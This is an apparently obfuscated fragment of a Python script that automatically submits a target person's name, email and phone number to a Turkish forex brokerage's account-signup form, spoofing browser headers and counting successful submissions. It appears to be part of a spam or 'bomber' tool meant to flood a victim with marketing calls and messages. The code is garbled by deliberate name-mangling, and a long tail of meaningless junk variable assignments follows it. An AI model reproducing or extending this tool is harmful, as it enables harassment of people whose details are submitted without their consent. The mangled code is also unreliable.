            AAaaaAAaAAaaAaAAaaA = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0", "Accept": "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB/html,application/xhtml+xml,application/xml;AaaaaAAAAaaAaAAAAaAa=0.9,image/avif,image/webp,*/*;AaaaaAAAAaaAaAAAAaAa=0.8", "Accept-Language": "tr-TR,tr;AaaaaAAAAaaAaAAAAaAa=0.8,en-US;AaaaaAAAAaaAaAAAAaAa=0.5,en;AaaaaAAAAaaAaAAAAaAa=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-p9; c24=---------------------------10601246112211673002609817109", "Origin": "https://www.gcmyatirim.com.tr", "Dnt": "1", "Referer": "https://www.gcmyatirim.com.tr", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1", "Te": "trailers"}
            p9 = f"-----------------------------10601246112211673002609817109\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"FirstName\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n{self.ad}\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------10601246112211673002609817109\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"LastName\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n{self.soyad}\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------10601246112211673002609817109\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"Email\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n{self.mail}\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------10601246112211673002609817109\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"PhoneCountryCode\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n90\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------10601246112211673002609817109\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"Phone\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n{self.phone}\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------10601246112211673002609817109\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"TraderSelect\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n4|TRY|/account\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------10601246112211673002609817109\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"MarketingMaterials\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\non\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------10601246112211673002609817109\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"TermsAgreement\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\non\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------10601246112211673002609817109\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"CityFromIP\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nIstanbul\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------10601246112211673002609817109\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"FormLogicHidden\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------10601246112211673002609817109\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"MarketingInfoHidden\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\XJZcfGhXpnhOndHJeSBHDBPoOuvsyxEUjmjUcTVpGRUAlHDkMRKbnBEWpqRaKLOOekCRWXdhdOHxvYd125=false&Y1676409556212412126=false&lIIIlIIIIlIlllllIIllIlIIIllllllIlllIIlIIIIlllIllIlIllllIllIllIllIIIllIllIllIlIIIllllIIIIIIlIlIlIIlIlIIlllllIlIIlIlllIIIllIlIIlI=PC&IIIlIIIllllIIIIlIIlIIIlIlIIIIIIIlIlllllIIlIIIIlIlIIlllIIIIIIIlIlIIIIllIIllllIlllIlllllIlIllIllIIIIIllllllllIlIIIIlIIIIIlIlIlIllI=1536X864&I129=Google&AAaAaAAaAAAaaaaAaaaAaAaaaAAaAAAAaAaaaAaAaaAaaAaaaAaAAAaAAAAAAaAAAaAaAaAAAaAAaaAAAAaaAaAaaAaaAaaAAaaaAaaaaaaAAAaAAaaaaAAAaAAAaaAaaa=TRY&JDcCYzGjyiWtYLvKPycdtolihbJMeUhLrPltpSrSRpsUtSEDtdBLnylTmPyxPQkxygChxzUfZZCHihM131=-3&UtUJnKNGzfaCmjeYUbrUFkTDtzIVjZUlOIljBBGeSgsbyLyHgGqwUeCRwZRdxYrVjJUMaHaBOWkGTMj132=Europe/Istanbul&lllIllllIlllllIIllIlIIIlIlIIlIIIlllIIIlIIIlIIIllIlIllIlIlllIllIIIlIIllIIllIllIIIllllIllIlIIIlIIIlIllIIIIIIIIlIIIlIlllIllIllllIIlIlllI=GA1.3.1834678061.1673704721&aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=true\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------10601246112211673002609817109\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"CountryCodeHidden\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nTR\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------10601246112211673002609817109\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"LcRefHidden\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n1673704723000|https%3A%2F%2Fwww.gcmyatirim.com.tr%2F%3Ftg%3Dgoogle%26tag1%3D14880889624%40127640464949%40550409485653%26gid%3Dforex%40p%40%40kwd-31652040%40g%26G_GEO%3D1012782%26G_GEOint%3D%26G_Device%3Dc%26G_DeviceModel%3D%26G_AdPos%3D%26Track%3DAccount%26gclid%3DEAIaIQobChMIpfPD95vH_AIVM_bVCh3caQg-EAAYASAAEgK31vD_BwE|https%3A%2F%2Fwww.google.com%2F|\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------10601246112211673002609817109\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"PhoneAreaCode\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n0\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------10601246112211673002609817109\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"Send\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nDenemeye Ba\xc5\x9fla\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------10601246112211673002609817109--\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n".encode("utf-8")
            DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10 = requests.post(eJhoMGofwkkXkchAzfwlRxopfQMdqDMnpdRaQDrmasHZiutIWBABURhYQbTEKkwGWvDrvsNQDDQkmmJ8, AAaaaAAaAAaaAaAAaaA=AAaaaAAaAAaaAaAAaaA, p9=p9, m12=False)
            if (DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10.status_code) == 302:
                print(f"{Fore.LIGHTGREEN_EX}[+] {Style.RESET_ALL}Başarılı! --> gcmyatirim.com.tr")
                self.adet += 1
            else:
                raise 
        except:
            print(f"{Fore.LIGHTRED_EX}[-] {Style.RESET_ALL}Başarısız! --> gcmyatirim.com.tr")

PGrSRoRptwqWLgAViiEGsVuwDqhFQPVeCXQtArPPfWHrdFGkRdHXYYgwvbTkFppFKbciXtkcTfaAzlj1 = 746
XwuSAXSgSsEbgTmXifOTXzSPWqmxYblzXuEgBqLGJuAqSYXdCpvLbyNRrwALfmZPHVeuzgcvgtjJjXw3 = "lGSvdVrruVmPnvJVTmxkELDtwgfkfgyunIPnEPhXfOXFCDFDcKjPdBGYNFQULsNkaQpIZyMWZCPnlHb"
llIll = "seuCQDMFpERJZRZCXdXaYfxMDaFOKiMDJeneFdGxGJwPtKsvnGcHVaWJHuXmfVTNnnYXdIRNgbKiUKY"
IlllllI = "QuiloXhluaSGfYpIXJRmKiXrGxfUCylPhCwrDoDQpCtIPTfgyaTJgnoGHVebdvjuBrGHYItqoJSOlfa"
SkxDOQFNwctrMpwJCOWKqAaJPEgomdGKAispVgicctNJCVOklWqUYhSJmtlVpnJjMuBveAYlfOBKjWH9 = 55
X11 = 371
llllllIlIIllI = "cWmbilenRdPzhURHXGyKWusJjsyJCdqvIjKgXtAKZhcqVSMfbBANfoJugpkjUXjLfvJYoJmisgZWCpV"
IllllIIIIIIlIII = 179
lllIlIIIlllIllIlI = 410
kfrgCAetDwIMJAslwFquTwEtrmPTwTBIfulgTSNrquhhEArrRZuHIKgmpmHfFLUeCkMkxMEmSkfmtAG19 = 572
aaaaAaaAAAaAAAaAaaAaa = 75
lPeVVtZLIKWqDjqGWojfKgELHUcePPzzAwbjjoykpNoamZLDniLsmppaKSaKVkhDZBzRlzwxuMHvtZV23 = "UEvLeSTRVRrNzQQWffQZLdOCPQgLDkhpzrtQzwPeBmLbtdqaJQmMLlgVCBIqLTrcKUejFeKQyPqRghA"
OKKvonQpTeaqzbleoFsQnbrSHtBxBcEBKQQDYLeeLLdvbwfpnOywdbuNeLQFIHMEgsxNAvIkXVncnBF25 = "HxNdzRvbyAddVSzSWdotupGrAiHgYUeVXADDTMovbAiuqkSaXjOyVADYPyoZVEBSSugyAOzLBXbMCAY"
H27 = 637
FgELhdOZwQnwSapwQUoQQlOokferrmeTfpyPKXROIinpcmsRDroDdkGNTwCzQBWBLJxyiZQDTrzzXIA29 = "wYBxZRSLWJJUbcjuWPQpCifnwDhXjYQEsbebCxMGWEhwMsEnnEDpXIVhGiRoTCmJKeLNzgDIwGjVNoU"
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy = 460
Y1676409556232358533 = 494
k1676409556232358535 = 475
c1676409556232358537 = "KwZrtJAKWNPEtRPojsWNTJKzLGxblESycSBcxDMKHEWzBalqCtdKAYViDtFsIkyeQqetKXeHcnhiltJ"
r1676409556232358539 = "XexzPAGZYidtAlcUDOlepVGZhrdFdUyspZhvjoWPrpgeAhJsrPpzlTTjzhgjWuowUnjxNsFTTpeXgDo"
IIlllIIIIlIllIIllIIIllIllIIIIIlIllIIIlllI = 516
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx = "YhCBNoiUXqapCpkSXbHsoYliVsJVTDodWMrVZIdAEwARbKybrrCfxosEfZboFLyxwqaYlrnhPtYUxaP"
IIllIIlIIllIIIIlIllIlIlllIIllIlIlIIIlllIlIlIl = "eKvtUQAElhlsoyjOadNdecySBwWoMOARaeLueEEbZqSRsQIIPAVVjHHmVgEiyFllcThWcCsJzlBQEHb"
lIlllIIlIIIlllllllIllIIlIlIlllIIIlIIlIIlllIIlll = "mEirhDPonoYscLwbAYCCXMqdiCXPuLLUOfjpVnMZxRvgOPqMaoaKfMLGKXMdDtZbHHgZLACfRyoPkGR"
llIIIllIIlIIlIllIIIIlIlIlIIlIllIlIIlIIIllIlIlllIl = 595
AAaaaAaaAaaaAaaaaaaAaaaAaaaAaAAAAAAAaAAaaAAaaAaAaAa = 252
c167640955623335553 = 361
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF = "RyfjLYIYajIKzkTvPqipaDnJYzaFEbtGhfXLlDzLrMtkUfnFzsjrwzJXUDSJymmopGICphGceyrghaT"
lIllIIlIllllIIIIIIIIIIlIIlIlllllIIIlIllIllIIIIlIIllIIlIII = 218
PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP = "SUgJOzIUaZyhLejyaEgyqBrRBDoCxVoFOIQhXSHxVdfZomzBnclXdnOSwbzRiKdEWrZVwNIWAWdShgw"
o61 = 295
UQlfWEPpCdhpOUbKJnQFVwVrYyHTxCkDHcmHdNZwpqMjLAVkFtTheEcxJNvFlZVwpHoLZUirennDYNh63 = 381
T167640955623335565 = "kmUbCtUMIBMPviPxtBBtAMijPMfSlfXjXFPkBmXasXRqLFJKGMHDEPBkPxwKqjbFyiJYLaCyVcfaPIb"
H167640955623335567 = 625
z167640955623335569 = "lSBsXLDoFTiMJWBBXsWhEozAlBzmyHeDNyYpBiuWUoYexdInkvghLnaaOCTLcmcTHZGBvajatIMthkw"
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX = 347
aAaAAaaaaAaaAAaAaAAAAAAAaaAAaaAaaAAaAaaaAAaaaaAAAaAaAaaAaAaAaaAAaaaAaAAaa = "qbUnWEzadZKyzvWBYydTkOyxZKrLGFdYltyLVKSpuHhtdNpRFhCnxhxbLSMvJWCqnayFzwYmcJvlFFy"
AaAAAAAAAaAAaAaAaAAaAAaAaaaAAaAAaAAAaAaaaaaAaaAAAaaAAAAAaAAAaaaaAaAAaaAaAaa = 270
D167640955623335577 = "KONntGqEahaNMLRsszpBHijAzKHdrJlluWjixRxPRbBCxmZuAwIIHjiftVvWVIyawOpraRlxEqxDtfh"
AaAaAAaaAAAaaaaaaAAaaaAaaAaAaaAaaAAAAAAaAAAAaaAAaAAaaaaAaAAAaAaAaaaAAaaAaAAaAAa = "zIhxiFwSnzhnwIvZKZyUaRmdlQGItNzDaclEuRMoYzqeuuIHfCiNdIIKKuIUZNBaclWGDjdtDOhHRmt"
SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS = "tSBkSwGmNBKhpdAKZxQpdauAbpOxxqezGWmjNohSrVimVOmeGIgBtsVASsChFkLkVmKrizAPYlOvEZv"
PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP = "oQxJwUwftyipcrPVJfuuVoxSMPSxwBqOujRcCdSuWrqjAGFdbkkDbdlTaGagjnrDJRaTlHEskXrRKcg"
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii = "yAypYuytGKoEwArbZPIzUwMyosdsirGZiIJSZZlZPwBrCBpSwEVLbxxreCPgNYLWiWoWgYBtTzarzOM"
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX = "hicrWVVcDlitRpUkKMIIUIPqNVxtvIFdfzUOxOmREryHGByEOscYyzidjFNztAMJZNwdWkwaaFtyBeX"
IllIIIlllIIlIlIIlIllIlIlllIIlIlIIIIllllIlllIIllIIIlIIIlIIIIIlIllIIIIIllIllllIIllIlllIIIIl = 774
GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG = 482
HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH = "TKXKfzWkGSfoyWzKERechxbikLwcOFEvTcAFGwMQgXePqcyfDncXAptDyIuQULLqfBjcZPOwkBWWFLY"
aAaAaAAAAaaaAAaaAaaAaaaAAaAaAaaAAaAAAaAAaAaaaaAaAaaaAAAAAaaaaAaAAAaaAaaaaAAaAAaAaaAAAAaAAAaaAaA = 337
dSecDFRCJHZTpIEzBqjwGnJMoarOLuwUZNocOWNPAkuXUuufeNNNjxPfDlbiiHvzhuAbPkPVgbZHGZo97 = 637
z167640955623435299 = 563
IllIIIIIllIllllllIIIIlIlllIIllIIllIllIIIlIIIllIIIIlIllIIlllIIllIlIIlIIllIIIlIIIlIIlIlIllllIlIIIlllIll = 543
jTxQRPfSdZGgpGwAsfNrqITqZLsdtNhmFlKgOLwmYgJWSynaaPeeWRZwjOnwiLpWftymFDAqiqENhxG103 = "zkFCyPNVaTpGmcILeRJsUTuSTluciZzsfGUjSEXTTpbkaRIDDiYwIXFolyIFnMPQcoueUUapmtLuPFQ"
AAaAAaaaAaaAAAaAaaAaAaAaAAaAAaaaaaaAaAaaaaAAAaAAaaAAaaAaaaAAAaaAaAAAaaAAaAaAaAAaAaaAAAAaaaaAAAaAAAAAaaAaa = 611
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW = 663
lIllIIlIllIIlIIIIIllllllIlIIlIIlIllIlIlIIIlIIIlIIIlllIIlllIIIIIlllIIllllIIllIIIllIIlIIIIIIIlIIIIIlIIlllIIIlll = "sZjPRtwyDlGPqKvwQgzTxeNisUTlxhIyKGcSzeLWqxMAfnMlRDumOZbDHqdCtlyVORbMaxrBitoeeGV"
n111 = "ZlOLOSgxUpJvfdOYUhdlKkxJrUWMzRzUBfltpcyheAinwhjGZymlVIGmPTaIvabQuIbgujkbwemjzqH"
lIIIIIIllIIIIllIllIlllllllIlIIIlIIlIllIIIllIIIllIlllIIIlIllIIIIIIlIIlllIIIlIIIIIIlIIllllIlllIlIllIllllIlIlIllIlII = 501
f115 = "lMkabeymSXLrfpteTvBlOPtvVlSrPNFaoqSmeoFwSpiQWGucvVKScqawzdJPADtaRpPsoptmpebOaJh"
YJFVQQvrjTvJQRkOYRzdmwAWPkQIvZctfwcehJFWsOqTNxsWwUnBsQBVZpChXDhYptKLGNmxCjaqeXr117 = 827
muZbbMkAlRYyQOBUwiICRzHjxtqFMhZoZYetkwIVolfBjFOkoANbPYlgcDFABSjoeVjUawjoyejglyi119 = 311
IllIlIIIIIllIIIllIllllIIlllIlIIlllIlIllIIlIIIlIIIIlIIIIllIlllIlIIlIlIIIIlllIllIIIllIlllIIIIIlllIllIlIIllIlIIIIllllIlllllI = "YgoAzmvBxakiPFPCjdwMPZeWAwqZSMgencxsQSZIduVFMFkSsxBxTEPKzIhTKmnATWsRnNrJSyIlWqi"
aAaaaAaaaAaaaAaAaaAaaAAAAAAaaAaaaAaAaaAaAAAaaAAAaaaaaAAaaAAAAaaaaAaAaaAAAAAaaAAaAaAaaaaaAaaaAaaAaAaAaAAaAaaAaAaaaAAAAAaaaAA = 239
IllIIlIlllIIIIIllIIIIIIllIlllllIIIlIIIlIIlIllIlIllIIIIIlllllIllllIIIIlIIlllllIlllIIllllIllIlIlllllIIIllIlllIIlIlIllIIIllIlIIl = "bTzSzrMKWFuGfhKoQSIFKEIMJbCoHfYcSwyPxoKeUrLXgVGzSMTyIGWOwEzhlhxVzHgxxkrvELoEuNz"
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee = 306
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW = 701
V131 = "WBqGGNVgmZpkPWXpLoEnhjrVdwqLRRzeUXGHTqFjIHDiZYmQHeutPHuqLXvlRjgSIwSjoPjMWRqvIES"
t133 = "LSmTqHZjOVtAbzRkltEkNZMOiUVLoNThuoTlwPpavPQSDYwMyFDeeRoYGgUKjiwcqwLyjXwAYiKZArN"
aaAaAaaAaAaaAaAAaAAaaaaAaaAaaaAAaAaaAAAaaaAaaAAaaAAAaaAAAAAAAAAAAAaAAaaaaaAAaaAAaaAaaaaaaaaAAAaaaAaAaAAAAaAAaAAaaaAAAAaaaAaAAAAaaaAaAaa = 397
h16764095562363472137 = "DInzODhZTLZKrxMKEUXPZPJGcjjPMpSoyzUIQVnabKHnobXWFqIVVkHCnUKkWhdyPafUPzHZWkvCikO"
M139 = "GEjMPJZiWyFBGHLEsUPvtCXNuLpwmffNLbkOqvucCjnBtXXOHAkJsspZwyGgmcWLZwYaRdnoTgRfgiM"
AAAAAaaaAaAaAAaaAaAAAAaAaAAAAAAAaAAaaAaAAAaaaaAaaaAaaAAaAAAAAAaAaAAaaaaAAAAAaaAAAaAaaaAaaAAaaaAaAaaAAaaaAaAaaaAAAAaAAAAaaAaaAaAaAAAAaAaaAAAAa = "WJOcYQwCgwtnqJaHQIdMXelhZYyMkHDISiMewLxJjprqiiMnFMmUpqjGcWivXphoCEmCtArCzwEoLBU"
rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr = 826
kAouWOASJWbJuoxESNEzoLpTuhZXPjcgRDPkQWMJBLRixMemaPcrRQCDLQsyJqwpZndVJnzaRZWuHge145 = "FWLOxKVLRfhoPAaGROmagtjWFrzyvWmLRKGcSGuUxHoDThEobOLaLyPHsrdXRvUfglXyiXlIyclaqpl"
VnaAahKLMboUdCkGztFWrUCVUFenInHUPMllgabdbQhiWVmslrPrkqDRhnJULktkxaAleBVBksgyrWb147 = 551
